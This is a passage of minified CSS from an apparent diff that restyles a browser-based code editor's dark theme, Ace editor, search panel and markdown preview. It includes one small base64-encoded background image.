.edit-right-frame .markdown-setting ul li.line{height:1px;background:#595959;}.code-theme-black .edit-right-frame .markdown-setting ul a,.code-theme-black .edit-right-frame .markdown-setting ul a:visited{color:#eef;}.code-theme-black .edit-right-frame .markdown-setting ul a i{color:#eef;}.code-theme-black .edit-right-frame .markdown-setting ul a:hover{background:#666666;color:#eef;}.code-theme-black .edit-right-frame .markdown-setting ul a:hover i{color:#eef;}.code-theme-black .search-content{background:#333;}.code-theme-black .search-content .bottom-toolbar{border-radius:4px;background:#474747;border:1px solid #595959;}.code-theme-black .search-content .bottom-toolbar a{color:#fff;}.code-theme-black .search-content .bottom-toolbar a .font-icon{color:#eef;}.code-theme-black .search-content .bottom-toolbar a:hover{color:#63acff;}.code-theme-black .search-content .bottom-toolbar a.select{background:#666666;color:#fff;}.code-theme-black .search-content .aui-icon,.code-theme-black .search-content .aui-main{background:#333;}.code-theme-black .search-content .aui-state-no-title .aui-inner{border:1px solid #666666;}.code-theme-black .ace-text-input{background:#333;}.code-theme-black .ace_search{background-color:#474747;border-color:#595959;color:#eef;}.code-theme-black .ace_search .ace_button{border:1px solid #595959;color:#fff;}.code-theme-black .ace_search .ace_button:hover{background-color:#595959;}.code-theme-black .ace_search .ace_button.checked{border-color:#39F;background:#39f;color:#fff;}.code-theme-black .ace_search .ace_search_field{background-color:#595959;border:1px solid #595959;color:#eef;}.code-theme-black .ace_search .ace_search_form.ace_nomatch .search-info{color:#f66;}.code-theme-black .ace_search .btn-background{background:#474747;border-color:#595959;color:#eef;}.code-theme-black .ace_search .btn-background-hover{background:#595959;border-color:#666666;}.code-theme-black .ace_search .ace_searchbtn,.code-theme-black .ace_search .ace_replacebtn{background:#474747;border-color:#595959;color:#eef;}.code-theme-black .ace_search .ace_searchbtn:hover,.code-theme-black .ace_search .ace_replacebtn:hover{background:#595959;border-color:#666666;}.code-theme-black .ace_search .ace_searchbtn.next,.code-theme-black .ace_search .ace_replacebtn.next{background:#474747;border-color:#595959;color:#eef;}.code-theme-black .ace_search .ace_searchbtn.next:hover,.code-theme-black .ace_search .ace_replacebtn.next:hover{background:#595959;border-color:#666666;}.code-theme-black .ace_search .ace_searchbtn.prev,.code-theme-black .ace_search .ace_replacebtn.prev{background:#474747;border-color:#595959;color:#eef;}.code-theme-black .ace_search .ace_searchbtn.prev:hover,.code-theme-black .ace_search .ace_replacebtn.prev:hover{background:#595959;border-color:#666666;}.code-theme-black .introduction{background:#3d3d3d;top:59px;}.code-theme-black .introduction pre{background:#3d3d3d;border-bottom:1px solid #474747;}.code-theme-black .introduction .tips h1{border-bottom:1px dashed #3d3d3d;}.code-theme-black .introduction .green{border-left:1px solid #3d3d3d;}.code-theme-black .context-menu-list .gotoline-input input{color:#eef;background:#666666;broder-color:#474747;}.code-theme-black .code-mode-list{background:#474747;color:#eef;}.code-theme-black .code-mode-list li.list-input{background:#474747;}.code-theme-black .code-mode-list li.list-input input{color:#eef;background:#666666;broder-color:#474747;}.code-theme-black .code-mode-list li.selected,.code-theme-black .code-mode-list li.selected.hover,.code-theme-black .code-mode-list li.hover{background:#666666;color:#fff;}.forceWap .edit-right-frame{width:0 !important;display:none;}.forceWap .resize{display:none;}.forceWap .ace_editor{width:100% !important;}.forceWap .edit-tab{display:none;}.forceWap .ace_search{top:29px;}.forceWap .ace_scroller{left:30px !important;}.forceWap .ace_gutter,.forceWap .ace_gutter-layer{width:30px !important;}.forceWap .ace_folding-enabled > .ace_gutter-cell{padding:0px 3px !important;}.forceWap .ace-editor-content{font-size:12px !important;}.forceWap .top-toolbar a[action="saveall"],.forceWap .top-toolbar a[action="refresh"],.forceWap .top-toolbar .menu-view-goto-line{display:none;}@media screen and (max-width:600px){.topbar .content .top-right{ display:none;}} -/* ver 4.05(2017-08-26) [build 1503738067.3554] */ \ No newline at end of file + a[markdown-action=tool-markdown-full] i.font-icon{color:#ccc !important;}.edit-content.markdown-full a[markdown-action=tool-markdown-max]{display:none;pointer-events:none;}.edit-content.markdown-full a[markdown-action=tool-markdown-max] i.font-icon{color:#ccc !important;}.markdown-preview{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;text-align:justify;margin:auto;font-size:13px;line-height:1.6em;color:#555;}.markdown-preview article,.markdown-preview footer,.markdown-preview header,.markdown-preview nav{width:700px;margin:0 auto;}.markdown-preview article{margin-top:4em;margin-bottom:4em;min-height:400px;}.markdown-preview footer{margin-bottom:50px;}.markdown-preview video{margin:2em 0;border:1px solid #ddd;}.markdown-preview nav{font-size:.9em;font-style:italic;border-bottom:1px solid #ddd;padding:1em 0;}.markdown-preview nav p{margin:0;}.markdown-preview details{margin:15px 0;}.markdown-preview summary{cursor:pointer;padding:4px;}.markdown-preview summary:focus{outline:none;box-shadow:0 0 3px #2196F3;}.markdown-preview .h1,.markdown-preview h1{font-size:2.2em;}.markdown-preview .h2,.markdown-preview h2{font-size:1.9em;}.markdown-preview .h3,.markdown-preview h3{font-size:1.6em;}.markdown-preview .h4,.markdown-preview h4{font-size:1.3em;}.markdown-preview .h5,.markdown-preview h5{font-size:1.2em;}.markdown-preview .h6,.markdown-preview h6{font-size:1.1em;}.markdown-preview .h1,.markdown-preview .h2,.markdown-preview .h3,.markdown-preview .h4,.markdown-preview .h5,.markdown-preview .h6,.markdown-preview h1,.markdown-preview h2,.markdown-preview h3,.markdown-preview h4,.markdown-preview h5,.markdown-preview h6{font-family:inherit;font-weight:500;color:#333;line-height:1.5em;padding:0;margin:1em 0 0.5em 0;}.markdown-preview .h1,.markdown-preview h1{letter-spacing:1px;border-bottom:1px solid #ddd;}.markdown-preview .h2,.markdown-preview h2{padding-bottom:0.15em;}.markdown-preview p{-webkit-hypens:auto;-moz-hypens:auto;hyphens:auto;margin:10px 0;word-wrap:break-word;}.markdown-preview blockquote{margin-left:1em;padding:10px 20px;margin:10px 0 20px 0;border-left:10px solid #ddd;background:#f6f6f6;}.markdown-preview blockquote p{margin:0;}.markdown-preview code{padding:2px 4px;color:#c7254e;background-color:#f9f2f4;border-radius:4px;}.markdown-preview pre{display:block;padding:0;overflow:auto;margin:0 0 10px;font-size:1em;line-height:1.42857143;word-break:break-all;word-wrap:break-word;color:#333;background:none;border-radius:4px;}.markdown-preview code,.markdown-preview kbd,.markdown-preview pre,.markdown-preview samp{font-family:Consolas, 'Liberation Mono', 'Ubuntu Mono', Menlo, Courier, sans-serif;}.markdown-preview pre code{background:#f8f8f8;color:#777;white-space:pre-wrap;padding:6px 1em;border:1px solid #eee;display:block;}.markdown-preview a{color:#1980e6;text-decoration:none;}.markdown-preview a:hover{text-decoration:underline;}.markdown-preview a img{border:none;}.markdown-preview img{max-width:100%;}.markdown-preview h1 a,.markdown-preview h1 a:hover{text-decoration:none;}.markdown-preview hr{border:0 none;height:4px;margin:1.2em 0;background:rgba(0,0,0,0) url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAYAAAAECAYAAACtBE5DAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyJpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNSBNYWNpbnRvc2giIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OENDRjNBN0E2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OENDRjNBN0I2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo4Q0NGM0E3ODY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo4Q0NGM0E3OTY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PqqezsUAAAAfSURBVHjaYmRABcYwBiM2QSA4y4hNEKYDQxAEAAIMAHNGAzhkPOlYAAAAAElFTkSuQmCC) repeat-x 0 0;}@media screen and (min-width:900px){.markdown-preview body{ width:900px;}}.markdown-preview ul,.markdown-preview ol{padding:0.5em 0 0.5em 3em;}.markdown-preview table{border-collapse:collapse;border-spacing:0;margin-bottom:20px;}.markdown-preview table thead{background:#eee;}.markdown-preview table td,.markdown-preview table th{padding:.5em;border:1px solid #ddd;line-height:1.5;}.markdown-preview .markdown-latex{text-align:center;margin-bottom:1.5em;font-size:1.6em;color:#000;}.markdown-preview .latex-inline .katex-display{display:inline-block;font-size:0.8em;}.markdown-preview .markdown-menu ul{padding:0 10px 20px 20px;}.markdown-preview .markdown-menu li{font-size:14px;list-style:none;line-height:1.8em;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;}.markdown-preview .markdown-menu-h2{padding-left:2em;}.markdown-preview .markdown-menu-h3{padding-left:4em;}.markdown-preview .markdown-menu-h4{padding-left:6em;}.markdown-preview .markdown-menu-h5{padding-left:8em;}.markdown-preview .markdown-menu-h6{padding-left:10em;}.markdown-preview div .hljs{color:#666;}.markdown-preview .hljs-comment,.markdown-preview .hljs-quote{color:#8e908c;}.markdown-preview .hljs-variable,.markdown-preview .hljs-template-variable,.markdown-preview .hljs-tag,.markdown-preview .hljs-name,.markdown-preview .hljs-selector-id,.markdown-preview .hljs-selector-class,.markdown-preview .hljs-regexp,.markdown-preview .hljs-deletion{color:#c82829;}.markdown-preview .hljs-number,.markdown-preview .hljs-built_in,.markdown-preview .hljs-builtin-name,.markdown-preview .hljs-literal,.markdown-preview .hljs-type,.markdown-preview .hljs-params,.markdown-preview .hljs-meta,.markdown-preview .hljs-link{color:#f5871f;}.markdown-preview .hljs-attribute{color:#eab700;}.markdown-preview .hljs-string,.markdown-preview .hljs-symbol,.markdown-preview .hljs-bullet,.markdown-preview .hljs-addition{color:#718c00;}.markdown-preview .hljs-title,.markdown-preview .hljs-section{color:#4271ae;}.markdown-preview .hljs-keyword,.markdown-preview .hljs-selector-tag{color:#8959a8;}.markdown-preview .hljs{display:block;overflow-x:auto;color:#4d4d4c;padding:0.5em;}.markdown-preview .hljs-emphasis{font-style:italic;}.markdown-preview .hljs-strong{font-weight:bold;}.code-theme-black .markdown-preview{background:#333;color:#bbb;}.code-theme-black .markdown-preview blockquote{border-color:#555;background:#444;}.code-theme-black .markdown-preview pre,.code-theme-black .markdown-preview code,.code-theme-black .markdown-preview pre code{color:#777;border-color:#444;background:#444;}.code-theme-black .markdown-preview code{color:#C5AC18;background:#555;background:rgba(255,255,255,0.15);}.code-theme-black .markdown-preview a{color:#FFA500;}.code-theme-black .markdown-preview hr{border-bottom:1px solid #444;background-image:none;}.code-theme-black .markdown-preview .h1,.code-theme-black .markdown-preview .h2,.code-theme-black .markdown-preview .h3,.code-theme-black .markdown-preview .h4,.code-theme-black .markdown-preview .h5,.code-theme-black .markdown-preview .h6,.code-theme-black .markdown-preview h1,.code-theme-black .markdown-preview h2,.code-theme-black .markdown-preview h3,.code-theme-black .markdown-preview h4,.code-theme-black .markdown-preview h5,.code-theme-black .markdown-preview h6{color:#fff;}.code-theme-black .markdown-preview table thead{background:#3e3e3e;}.code-theme-black .markdown-preview table td,.code-theme-black .markdown-preview table th{border-color:#444;}.code-theme-black .markdown-preview .markdown-latex{color:#fff;}.code-theme-black .markdown-preview div .hljs{display:block;overflow-x:auto;padding:.5em;background:#23241f;}.code-theme-black .markdown-preview .hljs,.code-theme-black .markdown-preview .hljs-subst,.code-theme-black .markdown-preview .hljs-tag{color:#f8f8f2;}.code-theme-black .markdown-preview .hljs-emphasis,.code-theme-black .markdown-preview .hljs-strong{color:#a8a8a2;}.code-theme-black .markdown-preview .hljs-bullet,.code-theme-black .markdown-preview .hljs-link,.code-theme-black .markdown-preview .hljs-literal,.code-theme-black .markdown-preview .hljs-number,.code-theme-black .markdown-preview .hljs-quote,.code-theme-black .markdown-preview .hljs-regexp{color:#ae81ff;}.code-theme-black .markdown-preview .hljs-code,.code-theme-black .markdown-preview .hljs-section,.code-theme-black .markdown-preview .hljs-selector-class,.code-theme-black .markdown-preview .hljs-title{color:#a6e22e;}.code-theme-black .markdown-preview .hljs-strong{font-weight:700;}.code-theme-black .markdown-preview .hljs-emphasis{font-style:italic;}.code-theme-black .markdown-preview .hljs-attr,.code-theme-black .markdown-preview .hljs-keyword,.code-theme-black .markdown-preview .hljs-name,.code-theme-black .markdown-preview .hljs-selector-tag{color:#f92672;}.code-theme-black .markdown-preview .hljs-attribute,.code-theme-black .markdown-preview .hljs-symbol{color:#66d9ef;}.code-theme-black .markdown-preview .hljs-class .hljs-title,.code-theme-black .markdown-preview .hljs-params{color:#f8f8f2;}.code-theme-black .markdown-preview .hljs-addition,.code-theme-black .markdown-preview .hljs-built_in,.code-theme-black .markdown-preview .hljs-builtin-name,.code-theme-black .markdown-preview .hljs-selector-attr,.code-theme-black .markdown-preview .hljs-selector-id,.code-theme-black .markdown-preview .hljs-selector-pseudo,.code-theme-black .markdown-preview .hljs-string,.code-theme-black .markdown-preview .hljs-template-variable,.code-theme-black .markdown-preview .hljs-type,.code-theme-black .markdown-preview .hljs-variable{color:#e6db74;}.code-theme-black .markdown-preview .hljs-comment,.code-theme-black .markdown-preview .hljs-deletion,.code-theme-black .markdown-preview .hljs-meta{color:#75715e;}.ace_optionsMenuEntry{height:22px;}.ace_optionsMenuCommand{float:left;width:210px;}.context-menu-list .context-menu-item.line-top{border-top:1px solid #eee !important;}body .ace_editor{font-family:Menlo, Consolas, source-code-pro, Monaco, 'Liberation Mono', 'Ubuntu Mono', Courier, 'Helvetica Neue', 'Microsoft Yahei', '微软雅黑', 'Lantinghei SC', STXihei, WenQuanYi, sans-serif;font-variant-ligatures:no-common-ligatures;margin:0;padding:0;position:absolute;height:100%;left:0px;right:0%;background:#fff;}body .ace_editor .ace_scrollbar{right:3px;}body .ace_editor .ace_hidden-cursors .ace_cursor{opacity:0.7;}body .ace_editor.ace-tomorrow .ace_cursor{color:#3c3434;}body .ace_editor.ace_multiselect .ace_cursor{border-left-width:2px;}body .ace_editor .ace_indent-guide{height:103%;display:inline-block;}body .ace_editor .ace_line{line-height:1.3em;line-height:inherit \9;}body .ace_editor span.ace_heading{font-weight:800;}body .ace_editor.ace_autocomplete{padding:0px;box-shadow:0px 2px 10px rgba(0,0,0,0.3);margin-left:5px;box-shadow:0 0 7px rgba(119,119,119,0.2), inset 1px 1px 0 rgba(0,0,0,0), inset -1px -1px 0 rgba(0,0,0,0);font-family:Menlo, Consolas, source-code-pro, Monaco, 'Liberation Mono', 'Ubuntu Mono', Courier, 'Helvetica Neue', 'Microsoft Yahei', '微软雅黑', 'Lantinghei SC', STXihei, WenQuanYi, sans-serif;background:#fff !important;}body .ace_editor.ace_autocomplete .ace_scrollbar-v{padding:0px;right:0px;}body .ace_editor.ace_autocomplete .ace_line{padding-left:6px;line-height:1.5em;}body .ace_editor.ace_autocomplete .ace_marker-layer .ace_active-line{background:#63acff !important;border-radius:0px;z-index:10;}body .ace_editor.ace_autocomplete .ace_line-hover{border:none;margin-top:0;background:#e6e6e6;border-radius:0px;}body .ace_editor.ace_autocomplete .ace_selected{color:#fff;}body .ace_editor.ace_autocomplete .ace_completion-highlight{color:#2882be;}body .ace_editor.ace_autocomplete .ace_rightAlignedText{color:#aaa;}body .ace_editor.ace_autocomplete .ace_selected .ace_completion-highlight{color:#cfe8ff !important;}body .ace_editor.ace_autocomplete .ace_selected .ace_rightAlignedText{color:#fff;z-index:10;opacity:0.5;filter:alpha(opacity=50);font-size:0.9em;}body .ace_editor .ace_content .ace_marker-layer .ace_selected-word{background:rgba(210,235,255,0.11);border:1px solid #65b5f5;z-index:10;}body .ace_editor .ace_content .ace_marker-layer .ace_bracket{border:1px solid #FF9800;background:#FFC107;}body .ace_editor .ace_content .ace_text-layer .ace_keyword{text-shadow:0 0 0.3px;}body .ace_editor .ace_invalid{background:none;color:#f60;}body .ace_editor.ace-github{color:#444;}body .ace_editor.ace-kuroir{background:#f9f9f9;}body .ace_editor.ace-kuroir .ace_invalid{background:none;color:#f60;}body .ace_editor.ace-solarized-light{background:#FDF6E3;}body .ace_editor.ace-solarized-light .ace_invalid{background:none;color:#f60;}body .ace_editor.ace-ambiance{background:#202020;}body .ace_editor.ace-ambiance .ace_invalid{background:none;color:#f60;}body .ace_editor.ace-monokai{background:#272822;}body .ace_editor.ace-monokai .ace_invalid{background:none;color:#f60;}body .ace_editor.ace-idle-fing{background:#333;}body .ace_editor.ace-idle-fing .ace_invalid{background:none;color:#f60;}body .ace_editor.ace-pastel-on-dark{background:#2C2828;}body .ace_editor.ace-pastel-on-dark .ace_invalid{background:none;color:#f60;}body .ace_editor.ace-solarized-dark{background:#002B36;}body .ace_editor.ace-solarized-dark .ace_invalid{background:none;color:#f60;}body .ace_editor.ace-twilight{background:#141414;}body .ace_editor.ace-twilight .ace_invalid{background:none;color:#f60;}body .ace_editor.ace-idle-fingers{background:#333;}body .ace_editor.ace-idle-fingers .ace_invalid{background:none;color:#f60;}body .ace_editor.ace-tomorrow-night-blue{background:#002451;}body .ace_editor.ace-tomorrow-night-blue .ace_invalid{background:none;color:#f60;}body .ace_editor.ace-tomorrow-night-eighties{background:#2d2d2d;}body .ace_editor.ace-tomorrow-night-eighties .ace_invalid{background:none;color:#f60;}body .ace_editor.ace-eclipse .ace_gutter{border-right:3px solid #6ce26c !important;}body .ace_editor.ace_dark .ace_content .ace_marker-layer .ace_selected-word{background:rgba(255,255,255,0.1);border:1px solid #4179A7;z-index:10;}body .ace_editor.ace_dark .ace_content .ace_marker-layer .ace_bracket{border:1px solid #FFEB3B;background:#6b6154;}div.ace_tooltip{font-size:1em;font-family:Menlo, Consolas, source-code-pro, Monaco, 'Liberation Mono', 'Ubuntu Mono', Courier, 'Helvetica Neue', 'Microsoft Yahei', '微软雅黑', 'Lantinghei SC', STXihei, WenQuanYi, sans-serif;border:1px solid #e7de81;background-color:#f9f2ad;padding-bottom:6px;color:#333;background-image:none;filter:none;box-shadow:0 0 7px rgba(119,119,119,0.2), inset 1px 1px transparent, inset -1px -1px transparent;}div.ace_tooltip hr{border:none;border-bottom:1px solid #e7de81;margin:6px 0;}.search-content .ace_search{font-size:13px;border-radius:0px 0px 0px 5px;border-right:0 none;overflow:visible;position:fixed;right:0;background-color:#eee;color:#444;width:100%;max-width:inherit;padding-top:5px;border-top:1px solid #ccc;bottom:0px;}.search-content .ace_search .ace_search_options{text-align:right;position:absolute;top:4px;margin:3px 0 0 20px;}.search-content .ace_search .ace_searchbtn_close{background-position:50% -10%;position:absolute;right:10px;width:18px;height:18px;}.search-content .ace_search .ace_searchbtn_close:hover{background-position:50% 120%;}.search-content .ace_search .ace_search_form,.search-content .ace_search .ace_replace_form{float:inherit;border:none;height:25px;}.search-content .ace_search .ace_search_form .search-info{position:absolute;right:25px;height:25px;line-height:25px;opacity:0.6;filter:alpha(opacity=60);}.search-content .ace_search .ace_search_form .search_at_index,.search-content .ace_search .ace_search_form .search_total_num{padding-left:0.3em;padding-right:0.3em;}.search-content .ace_search .ace_button{margin-left:3px;width:30px;text-align:center;display:inline-block;border-radius:3px;}.search-content .ace_search .ace_button.checked{border-color:#39F;background:#39f;color:#fff;}.search-content .ace_search .ace_search_field{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;-webkit-transition:none;-moz-transition:none;-o-transition:none;-ms-transition:none;transition:none;background-color:#FFF;border-radius:3px;border:1px solid #ccc;margin:0px;width:100%;height:24px;line-height:23px;}.search-content .ace_search .ace_search_field:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.search-content .ace_search .ace_search_field:focus{box-shadow:0 0 1px #75a1f0;}.search-content .ace_search .ace_search_action{position:absolute;right:50px;}.search-content .ace_search .ace_search_input{position:absolute;left:130px;right:160px;}.search-content .ace_search .ace_replace_form .ace_search_action{right:70px;}.search-content .ace_search .ace_search_form.ace_nomatch{outline:none;}.search-content .ace_search .ace_search_form.ace_nomatch .search-info{color:#f00;font-weight:800;}.search-content .ace_search .search-info.search-first{color:#03a9f4;font-weight:800;}.search-content .ace_search .history-list{position:absolute;right:8px;}.search-content .ace_search .history-list .dropdown-menu:before{right:4px;}.search-content .ace_search .history-list .dropdown-menu:after{right:5px;}.search-content .ace_search .history-list .dropdown-menu li > a{padding:3px 20px;font-size:13px;}.search-content .ace_search .history-list .dropmenu{width:20px;height:20px;background:rgba(50,50,50,0.05);cursor:pointer;font-size:15px;margin-top:2px;color:#ccc;display:inline-block;line-height:20px;text-align:center;border-radius:2px;}.search-content .ace_search .history-list .dropmenu:hover{background:rgba(50,50,50,0.2);color:#aaa;}.search-content .ace_search .history-list.open .dropmenu{background:rgba(50,50,50,0.2);color:#aaa;}.search-content .ace_search .btn-background{background:url("../../../images/common/buttons_40.png") 0 0px repeat-x;}.search-content .ace_search .btn-background-hover{background:url("../../../images/common/buttons_40.png") 0 -12px repeat-x;}.search-content .ace_search .ace_searchbtn,.search-content .ace_search .ace_replacebtn{float:left;padding:0 8px;border:1px solid #dcdcdc;margin-left:-1px;background:url("../../../images/common/buttons_40.png") 0 0px repeat-x;}.search-content .ace_search .ace_searchbtn:hover,.search-content .ace_search .ace_replacebtn:hover{background:url("../../../images/common/buttons_40.png") 0 -12px repeat-x;}.search-content .ace_search .ace_searchbtn:active,.search-content .ace_search .ace_replacebtn:active{outline:none;background:#ddd;}.search-content .ace_search .ace_searchbtn.next,.search-content .ace_search .ace_replacebtn.next{background:url("../../../images/common/buttons_40.png") 0 0px repeat-x;padding:0 4px;}.search-content .ace_search .ace_searchbtn.next:hover,.search-content .ace_search .ace_replacebtn.next:hover{background:url("../../../images/common/buttons_40.png") 0 -12px repeat-x;}.search-content .ace_search .ace_searchbtn.prev,.search-content .ace_search .ace_replacebtn.prev{background:url("../../../images/common/buttons_40.png") 0 0px repeat-x;padding:0 4px;}.search-content .ace_search .ace_searchbtn.prev:hover,.search-content .ace_search .ace_replacebtn.prev:hover{background:url("../../../images/common/buttons_40.png") 0 -12px repeat-x;}.code-theme-black{background:#333;}.code-theme-black pre{background:#333;}.code-theme-black div.tools{box-shadow:1px 2px 15px #3d3d3d;border-bottom:1px solid #474747;background:#3d3d3d;}.code-theme-black div.tools .right .btn{border:solid 1px #474747;background:#3d3d3d;color:#eef;}.code-theme-black div.tools .right .btn:hover{background:#474747;}.code-theme-black div.tools .line{border-color:#595959;}.code-theme-black div.tools a.select,.code-theme-black div.tools a.select:hover,.code-theme-black div.tools a:active,.code-theme-black div.tools a:hover{background:#595959;}.code-theme-black div.tools a .font-icon{color:#eef;text-shadow:none;}.code-theme-black div.tools .disable-mask{background:#000;}.code-theme-black .context-menu-list{border:none;background:#595959;border-bottom:none;box-shadow:0 10px 10px rgba(0,0,0,0.15);}.code-theme-black .context-menu-list .context-menu-item{color:#eef;border-color:rgba(255,255,255,0) !important;}.code-theme-black .context-menu-list .context-menu-item .font-icon{color:#eef;}.code-theme-black .context-menu-list .context-menu-item.context-menu-separator{border-bottom:1px solid #666666 !important;background:none;}.code-theme-black .context-menu-list .context-menu-item.hover,.code-theme-black .context-menu-list .context-menu-item.selected.hover{background:#666666;color:#eef;border-color:transparent !important;}.code-theme-black .context-menu-list .context-menu-item.hover .font-icon,.code-theme-black .context-menu-list .context-menu-item.selected.hover .font-icon{color:#eef;}.code-theme-black .context-menu-list .context-menu-item.line-top{border-top:1px solid #666666 !important;}.code-theme-black .dropdown-menu{background:#595959;}.code-theme-black .dropdown-menu:before{right:4px;}.code-theme-black .dropdown-menu:after{border-top-color:#595959;}.code-theme-black .dropdown-menu li > a{color:#eef;}.code-theme-black .edit-tab .tabs{background:#333;border-bottom:1px solid #474747;}.code-theme-black .edit-tab .tabs .tab{background:#474747;border-right:1px solid #595959;color:#eef;}.code-theme-black .edit-tab .tabs .close{opacity:0.05;filter:alpha(opacity=5);text-shadow:none;color:#666666;}.code-theme-black .edit-tab .tabs .tab.hover{background:#474747;}.code-theme-black .edit-tab .tabs .add{background:#595959;border:1px solid #3d3d3d;color:#eef;}.code-theme-black .edit-tab .tabs .add:hover{background:#666666;}.code-theme-black .edit-tab .tabs .tab.this{background:#666666;border-right:1px solid #666666;border-left:3px solid #63acff;margin-left:-3px;}.code-theme-black .draggable-dragging{background:#595959;border-left:3px solid #63acff;}.code-theme-black .edit-content .resize{background-color:#ddd;background-color:rgba(255,255,255,0.01);}.code-theme-black .edit-content .resize:hover{background-color:#ddd;background-color:rgba(255,255,255,0.1);}.code-theme-black .edit-content .resize.resize-active{background-color:#ddd;background-color:rgba(255,255,255,0.3);}.code-theme-black .edit-right-frame{background:#333;border-left:1px solid #3d3d3d;}.code-theme-black .edit-right-frame .function-list-parent{background:#333;}.code-theme-black .edit-right-frame .function-list-box .list-row{color:#eef;}.code-theme-black .edit-right-frame .function-list-box .list-row.row-hover{background:#3d3d3d;}.code-theme-black .edit-right-frame .function-list-box .list-row.row-select{background:#63acff;}.code-theme-black .edit-right-frame .function-list-box .list-row.mark,.code-theme-black .edit-right-frame .function-list-box .list-row.class{background:#595959;}.code-theme-black .edit-right-frame .preview-url-tool,.code-theme-black .edit-right-frame .function-list-tool{border-bottom:1px solid #3d3d3d;}.code-theme-black .edit-right-frame .preview-url-tool .box,.code-theme-black .edit-right-frame .function-list-tool .box{background:#333;color:#eef;border:none;}.code-theme-black .edit-right-frame .preview-url-tool .box a,.code-theme-black .edit-right-frame .function-list-tool .box a{padding:0px 6px;}.code-theme-black .edit-right-frame .preview-url-tool .box a:hover,.code-theme-black .edit-right-frame .function-list-tool .box a:hover{border:1px solid #666666;}.code-theme-black .edit-right-frame .preview-url-tool .input-content input,.code-theme-black .edit-right-frame .function-list-tool .input-content input{color:#eee;font-size:1.15em;text-shadow:none;background:#444;box-shadow:none;border:none;}.code-theme-black .edit-right-frame .preview-url-tool .input-content input:focus,.code-theme-black .edit-right-frame .function-list-tool .input-content input:focus{box-shadow:none;}.code-theme-black .edit-right-frame .function-search input{color:#eef;border:1px solid #595959;background:#474747;}.code-theme-black .edit-right-frame .preview-markdown-tool .box a .font-icon{color:#eef;}.code-theme-black .edit-right-frame .preview-markdown-tool .box a:hover{background:#666666;color:#eef;}.code-theme-black .edit-right-frame .preview-markdown-tool .box a:hover .font-icon{color:#eef;}.code-theme-black .edit-right-frame .preview-markdown-tool .toolbar{border-left:1px solid #595959;background:#3d3d3d;}.code-theme-black .edit-right-frame .preview-markdown-tool .toolbar .md-tools{color:#eef;}.code-theme-black .edit-right-frame .preview-markdown-tool .toolbar .md-tools:hover{background:#666666;}.code-theme-black .edit-right-frame .preview-markdown-tool .toolbar .md-tools.md-tools-split{color:#3d3d3d;}.code-theme-black .edit-right-frame .markdown-help{background:#474747;color:#eef;border-color:#595959;}.code-theme-black .edit-right-frame .markdown-help h3{border-color:#666666;}.code-theme-black .edit-right-frame .markdown-help h5{border-color:#666666;}.code-theme-black .edit-right-frame .markdown-help pre{background:#666666;color:#eef;}.code-theme-black .edit-right-frame .markdown-menu-box{background:#474747;color:#eef;border-color:#595959;}.code-theme-black .edit-right-frame .markdown-menu-box h3{border-color:#666666;}.code-theme-black .edit-right-frame .markdown-menu-box .markdown-menu li a{color:#ffa500;}.code-theme-black .edit-right-frame .markdown-menu-box .markdown-menu li a:hover{background:#666666;}.code-theme-black .edit-right-frame .markdown-setting{background:#474747;color:#eef;border-color:#595959;}.code-theme-black .edit-right-frame .markdown-setting ul li.line{height:1px;background:#595959;}.code-theme-black .edit-right-frame .markdown-setting ul a,.code-theme-black .edit-right-frame .markdown-setting ul a:visited{color:#eef;}.code-theme-black .edit-right-frame .markdown-setting ul a i{color:#eef;}.code-theme-black .edit-right-frame .markdown-setting ul a:hover{background:#666666;color:#eef;}.code-theme-black .edit-right-frame .markdown-setting ul a:hover i{color:#eef;}.code-theme-black .search-content{background:#333;}.code-theme-black .search-content .bottom-toolbar{border-radius:4px;background:#474747;border:1px solid #595959;}.code-theme-black .search-content .bottom-toolbar a{color:#fff;}.code-theme-black .search-content .bottom-toolbar a .font-icon{color:#eef;}.code-theme-black .search-content .bottom-toolbar a:hover{color:#63acff;}.code-theme-black .search-content .bottom-toolbar 